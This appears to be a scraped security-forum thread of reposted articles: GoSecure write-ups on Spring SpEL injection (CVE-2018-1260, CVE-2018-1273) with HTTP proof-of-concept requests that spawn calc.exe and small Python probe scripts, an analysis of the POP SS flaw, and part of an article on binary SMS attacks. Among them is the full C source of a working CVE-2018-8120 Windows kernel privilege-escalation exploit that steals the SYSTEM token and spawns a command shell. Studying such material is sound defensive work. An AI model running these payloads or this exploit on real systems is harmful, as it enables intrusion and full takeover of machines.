private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } At this point, we are unsure if the scopes attribute can be controlled by the remote user. While attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter part of OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application. Proof-of-Concept and Limitations When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the parameter scope. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe. This first request made used the scope “${1338-1}”, see picture below. Based on the response, we now have a confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see in the resulting HTML multiples instances of the string “scope.1337”. Pushing the probe value ${1338-1} A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations. Simple proof-of-concept request spawning a calc.exe subprocess For easier reproduction, here is the raw HTTP request from the previous screenshot. 
Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application: { -> %7b

POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1
Host: localhost:8080
Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 0

Reviewing The Fix
The solution chosen by the Pivotal team was to replace SpelView with a simpler view based on plain string concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection.
More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. That endpoint no longer uses SpelView either. It was found vulnerable to an identical attack vector in 2016: Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to Remote Code Execution.
Example with normal values
Example with an expression included in the model
This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6). Some analysts were skeptical of this fix and raised the possibility of the prefix being brute-forced if enough attempts are made. However, this is no longer a concern since SpelView was also removed from this endpoint.
The SpelView class is also present in Spring Boot. That implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes.
Limitation & exploitability
We encourage you to keep all your web applications' dependencies up-to-date. If for any reason you must delay last month's updates, here are the specific conditions for exploitation:
Spring OAuth2 in your dependency tree
Users must have the implicit flow enabled; it can be enabled along with other grant types
The scope list needs to be empty (not explicitly set to one or more elements)
The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the user profile of the attacker needs to have an empty list of scopes.
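If you need to test one of your own deployments against the conditions above, the harmless arithmetic probe shown earlier (${1338-1}) is easy to script. A sketch using Python's requests library; the host, client_id, credentials and bearer token below are the placeholder values from this article's lab setup and will differ in any real application:

import requests

params = {
    "response_type": "code",
    "client_id": "client",
    "grant_type": "password",
    "username": "user",
    "password": "user",
    "redirect_uri": "http://csrf.me",
    "scope": "${1338-1}",   # benign probe: shows up as 1337 if the scope reaches SpelView
}
headers = {"Authorization": "Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38"}

# requests URL-encodes the curly brackets for us, matching the encoding note above
r = requests.post("http://localhost:8080/oauth/authorize", params=params, headers=headers)
print("scope is evaluated" if "1337" in r.text else "scope not reflected or not evaluated")

Only run this against an instance you own; seeing scope.1337 echoed back in the approval page is the same confirmation described earlier.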
Conclusion This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class. As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaros Muñoz, pyn3rd and Gal Goldshtein who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal. Reference https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2 https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression language capabilities http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs Sursa: http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/
  13. Written by Philippe Arteau This February, we ran a Find Security Bugs scan on over at least one hundred components from the Spring Framework, including the core components (spring-core, spring-mvc) but also optional components (spring-data, spring-social, spring-oauth, etc.). From this exercise, we reported some vulnerabilities. In this blog post, we are going to give more details on a SpEL injection vulnerability. While some proof of concept code and exploitation details have already surfaced on Twitter, we will add a focus on how these vulnerabilities were found, followed by a thorough review of the proposed fix. Initial Analysis Our journey started when we noticed a suspicious expression evaluation in the MapDataBinder.java class, identified by the SPEL_INJECTION pattern as reported by Find Security Bugs. We discovered that the parameter propertyName came from a POST parameter upon form submission: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { if (!isWritableProperty(propertyName)) { // <---Validation here throw new NotWritablePropertyException(type, propertyName); } StandardEvaluationContext context = new StandardEvaluationContext(); context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService)); context.setTypeConverter(new StandardTypeConverter(conversionService)); context.setRootObject(map); Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation The sole protection against arbitrary expression evaluation appears to be the validation from the isWritableProperty method. Following the execution trace, it can be seen that the isWritableProperty method leads to the execution of getPropertyPath: @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } 1 2 3 4 5 6 7 8 9 @Override public boolean isWritableProperty(String propertyName) { try { return getPropertyPath(propertyName) != null; } catch (PropertyReferenceException e) { return false; } } private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } 1 2 3 4 5 private PropertyPath getPropertyPath(String propertyName) { String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", ""); return PropertyPath.from(plainPropertyPath, type); } We were about to review the PropertyPath.from() method in detail, but we realized a much easier bypass was possible: any value enclosed by brackets is removed and therefore the value is ignored. With this knowledge, the attack vector becomes clearer. We’re possibly able to submit a parameter name that would have the pattern “parameterName[T(malicious.class).exec(‘test’)]”. Building a Proof-of-concept An idea is nothing until it is put into action. 
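Before wiring up a full environment, the bypass itself can be sanity-checked in isolation. The sketch below simply mirrors the Java replaceAll pattern in Python to show why the validation never sees the payload:

import re

submitted = 'password[T(java.lang.Runtime).getRuntime().exec("calc")]'

# getPropertyPath() strips anything enclosed in square brackets before validating...
plain_property_path = re.sub(r"\[.*?\]", "", submitted)
print(plain_property_path)   # -> "password", a perfectly legitimate property name

# ...but the original, unstripped string is what later reaches parser.parseExpression().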
When performing extensive code review, the creation of a proof of concept can sometimes be difficult. Luckily, it was not the case for this vulnerability. The first step was obviously constructing a vulnerable environment. We reused an example project located in spring-data-examples repository. The web project used an interface as a form which is required to reach this specific mapper. After identifying the form, we built the following request and sent it with an HTTP proxy. We were instantly greeted with the calculator spawn, confirming the exploitability of the module: POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc 1 2 3 4 5 6 7 8 9 POST /users?size=5 HTTP/1.1 Host: localhost:8080 Referer: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: close Upgrade-Insecure-Requests: 1 username=test&password=test&repeatedPassword=test&password<strong>[T(java.lang.Runtime).getRuntime().exec("calc")]</strong>=abc Simple proof of concept request spawning a calc.exe subprocess Reviewing The Fix A complete fix was made in the changeset associated to the bug id DATACMNS-1264. Here is why it can be considered really effective. While the attack vector presented previously relies on the side effect of a regex, another risk was also found in the implementation. The processed value was parsed twice; once for validation, and once again for execution. This is a subtle detail that is often overlooked when performing code review. An attacker could potentially exploit one subtitle difference between each implementation. This remains theoretical because we didn’t find any difference between both. The correction made by Pivotal also addresses this small double parsing risk that could have introduced a vulnerability in the future. In the first place, a more limited expression parser (SimpleEvaluationContext) was used. Then, a new validation of the types is integrated as the expression is loaded and executed. The isWritableProperty method was kept but the security of the mapper doesn’t rely on it anymore: public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); 1 2 3 4 5 6 7 8 9 public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException { [...] EvaluationContext context = SimpleEvaluationContext // .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW Type validation .withConversionService(conversionService) // .withRootObject(map) // .build(); Expression expression = PARSER.parseExpression(propertyName); Is my application affected? Most Spring developers adopted Spring Boot to help dependency management. If this is your case, you should integrate the updates as soon as possible to avoid missing critical security patches, or growing your technical debt. 
If for any reason you must delay the last months’ updates, here are the specific conditions for the exploitation of this specific bug: Having spring-data-commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, in your dependency tree; At least one interface is used as a form (for example UserForm in the spring-data-examples project); Impacted forms from previous conditions are also accessible to attackers. What’s next? As the title implies, there will be a second part to this article, as a very similar vulnerability was identified in Spring OAuth2. We wanted to keep both vulnerabilities separate regardless of the similarities to avoid confusion with the exploitation conditions and the different payloads. You might be wondering where these SpEL injections are likely to be present, aside from the Spring Framework itself. It is unlikely that you will find web application logic directly using the SpEL API. Our offensive security team only recalls one occurrence of such conditions. The most probable case is reviewing other Spring components similar to data-commons. Additional checks can easily be added to your automated scanning tools. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. As implicitly demonstrated in this article, while this tool can be effective, the confirmation of the exploitability still requires a minimal understanding of the vulnerability class and a small analysis. We are hoping that this blog was informative to you. Maybe, you will find a similar vulnerability yourself soon. References https://pivotal.io/security/cve-2018-1273: Official publication by Pivotal https://github.com/find-sec-bugs/find-sec-bugs: Static Analysis tool used to find the vulnerability Sursa: http://gosecure.net/2018/05/15/beware-of-the-magic-spell-part-1-cve-2018-1273/
  14. cve-2018-8120 Details see: http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html #include <stdio.h> #include <tchar.h> #include <windows.h> #include <strsafe.h> #include <assert.h> #include <conio.h> #include <process.h> #include <winuser.h> #include "double_free.h" // Windows 7 SP1 x86 Offsets #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token #define SYSTEM_PID 0x004 // SYSTEM Process PID #pragma comment(lib,"User32.lib") typedef struct _FARCALL { DWORD Offset; WORD SegSelector; } FARCALL, *PFARCALL; FARCALL Farcall = { 0 }; LONG Sequence = 1; LONG Actual[3]; _NtQuerySystemInformation NtQuerySystemInformation; LPCSTR lpPsInitialSystemProcess = "PsInitialSystemProcess"; LPCSTR lpPsReferencePrimaryToken = "PsReferencePrimaryToken"; FARPROC fpPsInitialSystemProcess = NULL; FARPROC fpPsReferencePrimaryToken = NULL; NtAllocateVirtualMemory_t NtAllocateVirtualMemory; void PopShell() { STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); } FARPROC WINAPI KernelSymbolInfo(LPCSTR lpSymbolName) { DWORD len; PSYSTEM_MODULE_INFORMATION ModuleInfo; LPVOID kernelBase = NULL; PUCHAR kernelImage = NULL; HMODULE hUserSpaceKernel; LPCSTR lpKernelName = NULL; FARPROC pUserKernelSymbol = NULL; FARPROC pLiveFunctionAddress = NULL; NtQuerySystemInformation = (_NtQuerySystemInformation) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!ModuleInfo) { return NULL; } NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len); kernelBase = ModuleInfo->Module[0].ImageBase; kernelImage = ModuleInfo->Module[0].FullPathName; lpKernelName = (LPCSTR)ModuleInfo->Module[0].FullPathName + ModuleInfo->Module[0].OffsetToFileName; hUserSpaceKernel = LoadLibraryExA(lpKernelName, 0, 0); if (hUserSpaceKernel == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pUserKernelSymbol = GetProcAddress(hUserSpaceKernel, lpSymbolName); if (pUserKernelSymbol == NULL) { VirtualFree(ModuleInfo, 0, MEM_RELEASE); return NULL; } pLiveFunctionAddress = (FARPROC)((PUCHAR)pUserKernelSymbol - (PUCHAR)hUserSpaceKernel + (PUCHAR)kernelBase); FreeLibrary(hUserSpaceKernel); VirtualFree(ModuleInfo, 0, MEM_RELEASE); return pLiveFunctionAddress; } LONG WINAPI VectoredHandler1( struct _EXCEPTION_POINTERS *ExceptionInfo ) { HMODULE v2; if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xE06D7363) return 1; v2 = GetModuleHandleA("kernel32.dll"); ExceptionInfo->ContextRecord->Eip = (DWORD)GetProcAddress(v2, "ExitThread"); return EXCEPTION_CONTINUE_EXECUTION; } DWORD FindAddressByHandle( HANDLE hCurProcess ) { PSYSTEM_HANDLE_INFORMATION pSysHandleInformation = new SYSTEM_HANDLE_INFORMATION; DWORD size = 0xfff00; DWORD needed = 0; DWORD dwPid = 0; NTSTATUS status; pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(size); memset(pSysHandleInformation, 0, size); status = 
NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, size, &needed); // pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)new BYTE[needed]; // status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, needed, 0); // if (!status) // { // if (0 == needed) // { // return -1;// some other error // } // // The previously supplied buffer wasn't enough. // delete pSysHandleInformation; // size = needed + 1024; // // if (!status) // { // // some other error so quit. // delete pSysHandleInformation; // return -1; // } // } dwPid = GetCurrentProcessId(); for (DWORD i = 0; i < pSysHandleInformation->dwCount; i++) { SYSTEM_HANDLE& sh = pSysHandleInformation->Handles[i]; if (sh.dwProcessId == dwPid && (DWORD)hCurProcess == (DWORD)sh.wValue) { return (DWORD)(sh.pAddress); } } return -1; } HANDLE hDesHandle = NULL; DWORD dwCurAddress; PACCESS_TOKEN pToken; DWORD *v1; DWORD v2, *p2; DWORD i; PVOID Memory = NULL; DWORD ori_ret = 0; void __declspec(naked) EscapeOfPrivilege(HANDLE hCurProcess) { __asm { push ebp mov ebp,esp } //v1 = (DWORD *)&hCurProcess; if (DuplicateHandle(hCurProcess, hCurProcess, hCurProcess, &hDesHandle, 0x10000000u, 0, 2u)) { dwCurAddress = FindAddressByHandle(hDesHandle); if ( dwCurAddress == -1 ) { printf("Find Current Process address Failed!\n"); system("pause"); //exit(-1); } printf("addrProcess:0x%08x\n", dwCurAddress); v1 = (DWORD *)dwCurAddress; __asm{ push ecx; save context lea ecx, Farcall call fword ptr[ecx] mov eax, [esp] mov [ebp-0x2c], eax add esp,4 } p2 = &v2; p2 = *(DWORD**)fpPsInitialSystemProcess; pToken = ((PsReferencePrimaryToken_t)fpPsReferencePrimaryToken)(p2); // //// walk through token offset // if ((*p2 & 0xFFFFFFF8) != (unsigned long)pToken) // { // do // { // i = p2[1]; // ++p2; // ++v1; // } while ((i & 0xFFFFFFF8) != (unsigned long)pToken); // } Memory = (PVOID)(ULONG)((char*)dwCurAddress + 0xf8); *(PULONG)Memory = *(PULONG)((char*)p2 + 0xf8); __asm { mov eax, [ebp-0x2c] push eax mov eax, PopShell push eax retf } } } int fill_callgate(int a1, int a2, int a3) { int *v3; // edx int v4; // ecx signed int v5; // esi v3 = (int *)(a1 + 4); v4 = a2 + 352; v5 = 87; do { *v3 = v4; v4 += 8; v3 += 2; --v5; } while (v5); if (!a3) { *(DWORD *)(a1 + 96) = 0xC3; // ret *(WORD *)(a1 + 76) = a2 + 0x1B4; // address low offset *(WORD *)(a1 + 82) = (unsigned int)(a2 + 0x1B4) >> 16; // address high offset *(WORD *)(a1 + 78) = 0x1A8; // segment selector *(WORD *)(a1 + 80) = 0xEC00u; *(WORD *)(a1 + 84) = 0xFFFFu; *(WORD *)(a1 + 86) = 0; *(BYTE *)(a1 + 88) = 0; *(BYTE *)(a1 + 91) = 0; *(BYTE *)(a1 + 89) = 0x9Au; *(BYTE *)(a1 + 90) = 0xCFu; } return 1; } void main() { NTSTATUS ntStatus; PVOID pMappedAddress = NULL; SIZE_T SectionSize = 0x4000; DWORD_PTR dwArg1; DWORD dwArg2; PVOID pMappedAddress1 = NULL; RtlAdjustPrivilege_t RtlAdjustPrivilege; DWORD dwPageSize = 0; char szGDT[6]; struct _SYSTEM_INFO SystemInfo; HANDLE hCurThread = NULL, hCurProcess = NULL; HMODULE hNtdll = NULL; PVOID dwAllocMem = (PVOID)0x100; PVOID pAllocMem; HWINSTA hWndstation; DWORD temp; fpPsInitialSystemProcess = KernelSymbolInfo(lpPsInitialSystemProcess); fpPsReferencePrimaryToken = KernelSymbolInfo(lpPsReferencePrimaryToken); if ( fpPsInitialSystemProcess && fpPsReferencePrimaryToken ) { AddVectoredExceptionHandler(1u, VectoredHandler1); hCurThread = GetCurrentThread(); dwArg1 = SetThreadAffinityMask(hCurThread, 1u); printf("thread prev mask : 0x % 08x\n", dwArg1); __asm { sgdt szGDT; } temp = *(int*)(szGDT + 2); printf("addrGdt:%#p\n", *(int*)(szGDT + 2)); 
GetSystemInfo(&SystemInfo); dwPageSize = SystemInfo.dwPageSize; hNtdll = GetModuleHandle("ntdll.dll"); NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } RtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege"); if (!NtAllocateVirtualMemory) { printf("\t\t[-] Failed Resolving RtlAdjustPrivilege: 0x%X\n", GetLastError()); system("pause"); //exit(-1); } hCurProcess = GetCurrentProcess(); ntStatus = NtAllocateVirtualMemory(hCurProcess, &dwAllocMem, 0, (PULONG)&dwPageSize, 0x3000, 4); if (ntStatus) { printf("Alloc mem Failed! Error Code: 0x%08x!\n", ntStatus); system("pause"); //exit(-1); } pAllocMem = operator new(0x400); memset(pAllocMem, 0, 0x400u); *(DWORD *)(*(DWORD*)dwAllocMem + 0x14)= *(DWORD*)pAllocMem; *(DWORD *)(*(DWORD*)dwAllocMem + 0x2C) = temp+0x154; fill_callgate((int)pAllocMem, temp, 0); //*(DWORD *)(v22 + 20) = *(DWORD*)pAllocMem; //*(DWORD *)(v22 + 44) = v22[1] + 340; printf("ready to trigger!\n"); hWndstation = CreateWindowStationW(0, 0, 0x80000000, 0); if ( hWndstation ) { if (SetProcessWindowStation(hWndstation)) { __asm { //int 3 push esi mov esi, pAllocMem push eax push edx push esi push esi mov eax,0x1226 mov edx, 7FFE0300h call dword ptr[edx] pop esi pop esi pop edx pop eax pop esi } Farcall.SegSelector = 0x1a0; EscapeOfPrivilege( hCurProcess ); PopShell(); } else { int n = GetLastError(); printf("step2 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { int n = GetLastError(); printf("step1 failed:0x%08x\n", n); system("pause"); //exit(-1); } } else { printf("Init Symbols Failed! \n"); system("pause"); //exit(-1); } } Sursa: https://github.com/bigric3/cve-2018-8120
  15. Dissecting the POP SS Vulnerability Author: Joe Darbyshire No Comments Share: The newly uncovered POP SS vulnerability takes advantage of a widespread misconception about behaviour of pop ss or mov ss instructions resulting in exceptions when the instruction immediately following is an interrupt. It is a privilege escalation, and as a result it assumes that the attacker has some level of control over a userland process (ring 3). The attack has the potential to upgrade their privilege level to ring 0 giving them complete control of the target system. By jailing the guest OS using a hypervisor which operates at a hardware-enforced layer below ring 0 on the machine, PCs protected by Bromium are immune to threats of this nature. Today we are dissecting the pop ss or mov ss vulnerability. To understand the attack, you must first be familiar with CPU interrupts and exceptions. CPU interrupts and exceptions Interrupts and exceptions are used by the CPU to interrupt the currently executing program in order to handle unscheduled events such as the user pressing a key or moving the mouse. Exceptions also interrupt the currently running process, but in response to an event (usually an error) resulting from the currently executing instruction. The need for these two CPU features stems from the fact that these events are not predetermined and must be dealt with as and when they occur, rather than according to a predefined schedule. When an interrupt or exception is triggered, it is down to the OS to decide how to handle it. There are operating system routines for each type of interrupt which can be triggered by the CPU to determine, from the current state information, how the instruction should be dealt with. The pop ss vulnerability takes advantage of a bug in OS routines for dealing with interrupts caused by unexpected #db (debug) exceptions triggered in the kernel. The root of the vulnerability Under normal circumstances, CPU exceptions are triggered immediately upon retirement of the instruction that caused them. However, with pop ss and mov ss instructions this is deemed unsafe since they are used as part of sequence such as the following to switch stacks: mov ss, [rax] mov rsp, rbp If mov ss, [rax] causes an exception, it would be handled with an invalid stack pointer since the stack segment offset has been changed but the new stack pointer has not yet been set. Consequently, the design decision was made to trigger the exception on retirement of the instruction immediately following the offending instruction to allow the stack pointer to be set correctly. Whilst this solved the issue of exception handling with an invalid stack pointer, it had the unforeseen side effect of creating an unexpected state for the OS if the next instruction was itself an interrupt such as in the following case: mov ss, [rax] int 0x1 In this scenario, due to the context switch caused by int 0x1 which is executed before the exception handler, the handler will be triggered from ring 0 despite being caused by ring 3 code. Since OS developers have been operating under the assumption that ring 0 code exclusively will be responsible for exceptions triggered within the kernel, this causes them to potentially mishandle this edge case whereby an exception is triggered from within the kernel by a userland process. 
The paper published describes one way in which the attacker can use this scenario to manipulate kernel memory in unintended ways by tricking the kernel into operating on userland data structures when handling the exception. In the kernel, the gs segment register is used as a pointer to various kernel related data structures. Following a system call, the kernel calls swapgs to set the gs register to the kernel specific value, and, upon exit from the kernel, swapgs is called again to return it to its original userland value. However, in our case, an exception was triggered before swapgs could be executed by the kernel so it is still using a user defined gs value upon triggering the exception from ring 0. In handling the interrupt, vulnerable OSs determine whether swapgs needs to be called based on the location which the interrupt was fired from. If the exception was triggered from the kernel, the OS makes the (incorrect) assumption that, swapgs has already been called when context was first switched to the kernel, so it attempts to handle it without executing this instruction first. As a result the exception is handled using a user defined gs register value creating the opportunity to corrupt kernel memory in a manner which allows for arbitrary code execution. Bromium immunity Bromium VMs are immune to escape using this kind of attack since user memory along with kernel memory is jailed within the hypervisor and specific to each instance. As a result, nothing is gained even when an attacker gains complete control of the kernel within a VM – there is no sensitive information to steal and no way for an attacker to propagate or persist. There are certain kinds of hypervisors that are potentially vulnerable to this attack including Xen legacy PV VMs. This is because the architecture runs the hypervisor at ring 0, whilst the kernel and userspace both operate as ring 3 processes communicating with one another via the hypervisor. As a result, if the hypervisor mishandles an exception, this allows for the attacker to obtain ring 0 on the physical machine effectively escaping the VM. The Bromium hypervisor is protected from this threat since it operates at a hardware-enforced layer which sits behind ring 0 for all the VMs on a system. Learn more about the Bromium Secure Platform. Sursa: https://blogs.bromium.com/dissecting-pop-ss-vulnerability/
  16. Binary SMS - The old backdoor to your new thing Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles due to an abundance of cellular coverage. To phone users, SMS means a basic 160 character text message. To carriers and developers it offers a much more powerful range of options, with sizes up to a theoretical maximum of 35KB and a myriad of binary payloads detailed within the GSM 03.40 specification. Carriers make use of these advanced features for remote management. They can send remote command SMS messages to trigger and interact with hidden applications on their devices without the user's consent. Law Enforcement can track a phone with 'silent' SMS messages designed not to alert the user. SMS technology underpins a lot of Mobile Device Management (MDM) frameworks. The coupling between a smart-phone’s software and it's radio is a lot closer than you might think. SMS messages containing malicious payloads can be targeted at listening applications on a device and from there processed by the target software. If the software is poorly written, remote memory corruption and arbitrary code execution are possible.The vehicle for getting a payload to a target application on a phone (or smart device) is the Protocol Data Unit (PDU) which contains framed user data which is forwarded, without inspection, to a logical port on the operating system – with the privileges of the radio (System normally). This is comparable to a computer running open services on the internet without a firewall. Legalities and options The GSM spectrum is very expensive private property. You may not transmit (or even receive) in GSM bands without permission. In the UK, it is an offence under the Wireless Telegraphy Act to transmit on licensed bands without permission and furthermore intercepting GSM without a warrant is an offence under the Regulation of Investigatory Powers Act.You should apply for a licence (example from OFCOM below) before commencing GSM testing and will also need a faraday cage to suppress radiation. (For these reasons, GSM interfaces get less scrutiny than TCP/IP for example). If you feel compelled to write another OpenBTS blog, we recommend not publishing screenshots that suggest you broke the law as this would be very irresponsible and could compromise your company's reputation. For users on a budget, you can send SMS PDUs as a regular subscriber over an existing public carrier using a GSM modem but you must check your carrier's terms and conditions first.Using Vodafone's Terms and Conditions for example, customers are not allowed to use the service to break the law or use automated means to send texts. Scripting your testing to attack someone else's phone would definitely not be allowed but manually sending an SMS PDU (or two) to test a phone you own could be OK. It is up to you to satisfy yourself that you are compliant with your carrier's terms and conditions. SMS PDU mode There are two defined modes for SMS: Text and raw PDU mode. In PDU mode, the entire frame can be defined which opens up a huge attack surface in the form of the (user defined) encapsulating fields as well as the prospect for a malicious payload to be received by a target application on the phone. 
The beauty of PDU mode is a poorly written software application on a handset can be exploited remotely.This is made possible through the Protocol Data Unit (PDU) which allows large messages to be fragmented as Concatenated SMS (C-SMS) and crucially from a security aspect, messages to be addressed to different applications on a mobile using port numbers akin to TCP/IP. WAP push is a popular example of a binary PDU. A typical WAP push message from your carrier may contain GPRS or MMS configuration settings which after reassembly appears as a special message which requests user permission to define new network configuration values defined within an XML blob. WAP might well be a legacy protocol, but it's a powerful legacy protocol which can be used for many malicious purposes. Displaying a text message is optional. Some SMS messages can be sent to your handset without your knowledge and will never appear in your inbox (a silent SMS). Message display can also be forced by setting the 'Class 0' type (flash SMS) which will cause the SMS to display in the foreground without user interaction. This public alerting system is used in the US by the emergency services and is typically delivered as a cell broadcast whereby all subscribers attached to a tower receive the SMS simultaneously. SMS test environment options When testing SMS PDUs you can do it in your own private test environment with a GSM test licence or over a public carrier. A private environment has several key advantages: Cost – Sending lots of SMS messages can be expensive, especially once you start concatenating messages. Control – SMS messages on a busy carrier are subject to unpredictable delays and contractual restrictions Debugging – a private environment will allow you to monitor messages and responses on the air interface which is essential for early testing. A public carrier is (potentially) much cheaper and quicker to use, with just a 3G dongle, but forfeits control and is subject to the terms and conditions of your carrier which may not allow testing with their 